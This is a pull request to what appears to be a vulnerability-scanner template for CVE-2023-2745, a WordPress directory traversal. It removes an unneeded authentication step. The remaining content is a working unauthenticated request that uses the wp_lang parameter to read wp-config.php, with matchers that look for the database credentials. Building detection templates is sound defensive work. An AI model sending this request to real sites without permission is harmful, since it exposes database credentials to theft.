### PR TITLE
Fix false-negative in CVE-2023-2745 template

### DIFF
--- a/http/cves/2023/CVE-2023-2745.yaml
+++ b/http/cves/2023/CVE-2023-2745.yaml
@@ -20,7 +20,7 @@ info:
     epss-score: 0.77175
     epss-percentile: 0.98989
   metadata:
-    max-request: 3
+    max-request: 2
     framework: wordpress
   tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi,vuln,vkev
 
@@ -35,17 +35,10 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body, "/wp-content/plugins")'
+          - 'contains(body, "/wp-content/") || contains(body, "wp-includes") || contains(body, "wp-json")'
         internal: true
 
   - raw:
-      - |
-        POST /wp-login.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
       - |
         GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
         Host: {{Hostname}}
@@ -53,7 +46,6 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains_all(body_2, "DB_NAME", "DB_PASSWORD")'
-          - 'status_code_2 == 200'
+          - 'status_code == 200'
+          - 'contains_all(body, "DB_NAME", "DB_PASSWORD")'
         condition: and
-# digest: 490a004630440220292f6ff79fecd10b87ba64aed140fec34af21ac7edf1422a7bfc23d6f1febeb202207aab607537a84e5b3d7e3a194d439b85b8b3d995dd431f64b2d87f42d07deeac:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
This PR fixes a false-negative in the CVE-2023-2745 template.

The existing template required username/password variables and attempted authentication before testing the vulnerable wp_lang parameter. However, CVE-2023-2745 is an unauthenticated directory traversal issue.

Changes:
- Removed unnecessary authentication request
- Reduced request count from 3 to 2
- Added direct unauthenticated traversal detection
- Simplified matchers to avoid unresolved variable failures

Fixes #16133